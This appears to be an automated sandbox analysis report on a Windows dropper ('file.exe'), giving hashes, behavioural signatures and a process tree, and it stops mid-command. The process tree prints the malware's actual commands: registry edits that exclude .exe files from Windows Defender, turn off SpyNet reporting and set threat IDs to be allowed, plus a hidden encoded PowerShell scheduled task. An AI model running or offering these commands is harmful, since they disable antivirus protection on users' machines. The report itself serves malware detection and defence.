Analysis
-
max time kernel
96s -
max time network
110s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system -
submitted
19/04/2023, 18:34
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20230220-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
9b2f88d0b9d260fdfbf606f19577308e
-
SHA1
d90da845541355034efc4480a5d97a211a03a745
-
SHA256
2e56d01448b731adb1b35fc72228af0efa4f10c254e03d914113702e6b2bdfd5
-
SHA512
bab68e67dfd309b94d744bcdb21968fb1810b942ab5cc131a1a61a3f6fd99e357cc28d17dc878ec6d9b57ae4b53708c40ac7e08c2a73393bc069609190eabe9b
-
SSDEEP
196608:91OLashz3FJ5/UI3hOxCHG7qn3+CYierPRURuWkcyvFYP:3OJhzVJNb393+5i8ZURuWPy+
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 65 320 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation whfErpC.exe -
Executes dropped EXE 4 IoCs
pid Process 4284 Install.exe 4104 Install.exe 3240 SxsvKTq.exe 2680 whfErpC.exe -
Loads dropped DLL 1 IoCs
pid Process 320 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json whfErpC.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini whfErpC.exe -
Drops file in System32 directory 27 IoCs
description ioc Process File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini SxsvKTq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies whfErpC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA whfErpC.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol SxsvKTq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_91DF16218BAC821A4575D2F721820BAA whfErpC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_A64929E2A42F7C92FC67B1EBAC2A88F1 whfErpC.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 whfErpC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache whfErpC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content whfErpC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol whfErpC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_91DF16218BAC821A4575D2F721820BAA whfErpC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData whfErpC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA whfErpC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 whfErpC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE whfErpC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 whfErpC.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft whfErpC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5038C0447BCAF9C6EE7F2D13E3E0DDAD whfErpC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5038C0447BCAF9C6EE7F2D13E3E0DDAD whfErpC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA whfErpC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA whfErpC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_A64929E2A42F7C92FC67B1EBAC2A88F1 whfErpC.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 whfErpC.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak whfErpC.exe File created C:\Program Files (x86)\uzjGIbOFKwqU2\hbyZlFVMBBzxN.dll whfErpC.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi whfErpC.exe File created C:\Program Files (x86)\xbGBeBqdnfmWSnEyoVR\vrGRRZO.dll whfErpC.exe File created C:\Program Files (x86)\HqWclUkqRTUn\QJddwPy.dll whfErpC.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi whfErpC.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak whfErpC.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja whfErpC.exe File created C:\Program Files (x86)\PSrMLwgNU\hGHxdwB.xml whfErpC.exe File created C:\Program Files (x86)\uzjGIbOFKwqU2\dXeoxoh.xml whfErpC.exe File created C:\Program Files (x86)\MySKhCIAjPpVC\xiMNyWU.xml whfErpC.exe File created C:\Program Files (x86)\PSrMLwgNU\bZFMBx.dll whfErpC.exe File created C:\Program Files (x86)\xbGBeBqdnfmWSnEyoVR\HBfgzWt.xml whfErpC.exe File created C:\Program Files (x86)\MySKhCIAjPpVC\BUCVulx.dll whfErpC.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bXdYnizyUUWLarOGTm.job schtasks.exe File created C:\Windows\Tasks\pBhpQhEndrCBLmKcV.job schtasks.exe File created C:\Windows\Tasks\KlOugEwrPWYFNkY.job schtasks.exe File created C:\Windows\Tasks\oIOmecagrUeRFYAlI.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4368 schtasks.exe 3796 schtasks.exe 4820 schtasks.exe 1428 schtasks.exe 3256 schtasks.exe 3788 schtasks.exe 5044 schtasks.exe 5052 schtasks.exe 824 schtasks.exe 3044 schtasks.exe 4668 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" whfErpC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix whfErpC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume whfErpC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{7e74cb8c-0000-0000-0000-d01200000000} whfErpC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{7e74cb8c-0000-0000-0000-d01200000000}\MaxCapacity = "15140" whfErpC.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{7e74cb8c-0000-0000-0000-d01200000000}\NukeOnDelete = "0" whfErpC.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" whfErpC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" whfErpC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" whfErpC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" whfErpC.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" whfErpC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe -
Suspicious behavior: EnumeratesProcesses 44 IoCs
pid Process 760 powershell.EXE 760 powershell.EXE 4908 powershell.exe 4908 powershell.exe 4156 powershell.exe 4156 powershell.exe 4664 powershell.EXE 4664 powershell.EXE 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe 2680 whfErpC.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 760 powershell.EXE Token: SeDebugPrivilege 4908 powershell.exe Token: SeDebugPrivilege 4156 powershell.exe Token: SeDebugPrivilege 4664 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4536 wrote to memory of 4284 4536 file.exe 82 PID 4536 wrote to memory of 4284 4536 file.exe 82 PID 4536 wrote to memory of 4284 4536 file.exe 82 PID 4284 wrote to memory of 4104 4284 Install.exe 83 PID 4284 wrote to memory of 4104 4284 Install.exe 83 PID 4284 wrote to memory of 4104 4284 Install.exe 83 PID 4104 wrote to memory of 4220 4104 Install.exe 84 PID 4104 wrote to memory of 4220 4104 Install.exe 84 PID 4104 wrote to memory of 4220 4104 Install.exe 84 PID 4104 wrote to memory of 3228 4104 Install.exe 86 PID 4104 wrote to memory of 3228 4104 Install.exe 86 PID 4104 wrote to memory of 3228 4104 Install.exe 86 PID 4220 wrote to memory of 2224 4220 forfiles.exe 88 PID 4220 wrote to memory of 2224 4220 forfiles.exe 88 PID 4220 wrote to memory of 2224 4220 forfiles.exe 88 PID 2224 wrote to memory of 1876 2224 cmd.exe 89 PID 2224 wrote to memory of 1876 2224 cmd.exe 89 PID 2224 wrote to memory of 1876 2224 cmd.exe 89 PID 3228 wrote to memory of 728 3228 forfiles.exe 90 PID 3228 wrote to memory of 728 3228 forfiles.exe 90 PID 3228 wrote to memory of 728 3228 forfiles.exe 90 PID 2224 wrote to memory of 1164 2224 cmd.exe 91 PID 2224 wrote to memory of 1164 2224 cmd.exe 91 PID 2224 wrote to memory of 1164 2224 cmd.exe 91 PID 728 wrote to memory of 4184 728 cmd.exe 92 PID 728 wrote to memory of 4184 728 cmd.exe 92 PID 728 wrote to memory of 4184 728 cmd.exe 92 PID 728 wrote to memory of 1912 728 cmd.exe 93 PID 728 wrote to memory of 1912 728 cmd.exe 93 PID 728 wrote to memory of 1912 728 cmd.exe 93 PID 4104 wrote to memory of 4368 4104 Install.exe 97 PID 4104 wrote to memory of 4368 4104 Install.exe 97 PID 4104 wrote to memory of 4368 4104 Install.exe 97 PID 4104 wrote to memory of 2880 4104 Install.exe 99 PID 4104 wrote to memory of 2880 4104 Install.exe 99 PID 4104 wrote to memory of 2880 4104 Install.exe 99 PID 760 wrote to memory of 1000 760 powershell.EXE 104 PID 760 wrote to memory of 1000 760 powershell.EXE 104 PID 4104 wrote to memory of 4132 4104 Install.exe 112 PID 4104 wrote to memory of 4132 4104 Install.exe 112 PID 4104 wrote to memory of 4132 4104 Install.exe 112 PID 4104 wrote to memory of 5044 4104 Install.exe 114 PID 4104 wrote to memory of 5044 4104 Install.exe 114 PID 4104 wrote to memory of 5044 4104 Install.exe 114 PID 3240 wrote to memory of 4908 3240 SxsvKTq.exe 117 PID 3240 wrote to memory of 4908 3240 SxsvKTq.exe 117 PID 3240 wrote to memory of 4908 3240 SxsvKTq.exe 117 PID 4908 wrote to memory of 740 4908 powershell.exe 119 PID 4908 wrote to memory of 740 4908 powershell.exe 119 PID 4908 wrote to memory of 740 4908 powershell.exe 119 PID 740 wrote to memory of 4920 740 cmd.exe 120 PID 740 wrote to memory of 4920 740 cmd.exe 120 PID 740 wrote to memory of 4920 740 cmd.exe 120 PID 4908 wrote to memory of 3704 4908 powershell.exe 121 PID 4908 wrote to memory of 3704 4908 powershell.exe 121 PID 4908 wrote to memory of 3704 4908 powershell.exe 121 PID 4908 wrote to memory of 3804 4908 powershell.exe 122 PID 4908 wrote to memory of 3804 4908 powershell.exe 122 PID 4908 wrote to memory of 3804 4908 powershell.exe 122 PID 4908 wrote to memory of 1828 4908 powershell.exe 123 PID 4908 wrote to memory of 1828 4908 powershell.exe 123 PID 4908 wrote to memory of 1828 4908 powershell.exe 123 PID 4908 wrote to memory of 2100 4908 powershell.exe 124 PID 4908 wrote to memory of 2100 4908 powershell.exe 124
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4536 -
C:\Users\Admin\AppData\Local\Temp\7zS6B9F.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4284 -
C:\Users\Admin\AppData\Local\Temp\7zS87B3.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4220 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2224 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1876
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1164
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:3228 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:728 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:4184
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1912
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ggDWiCsTD" /SC once /ST 07:42:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:4368
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ggDWiCsTD"4⤵PID:2880
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ggDWiCsTD"4⤵PID:4132
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bXdYnizyUUWLarOGTm" /SC once /ST 20:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\scRiQJwYnZurGYzcC\ZrLmggqzYyKemQH\SxsvKTq.exe\" en /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5044
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:760 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1000
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4984
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:3344
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2268
-
C:\Users\Admin\AppData\Local\Temp\scRiQJwYnZurGYzcC\ZrLmggqzYyKemQH\SxsvKTq.exeC:\Users\Admin\AppData\Local\Temp\scRiQJwYnZurGYzcC\ZrLmggqzYyKemQH\SxsvKTq.exe en /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3240 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD 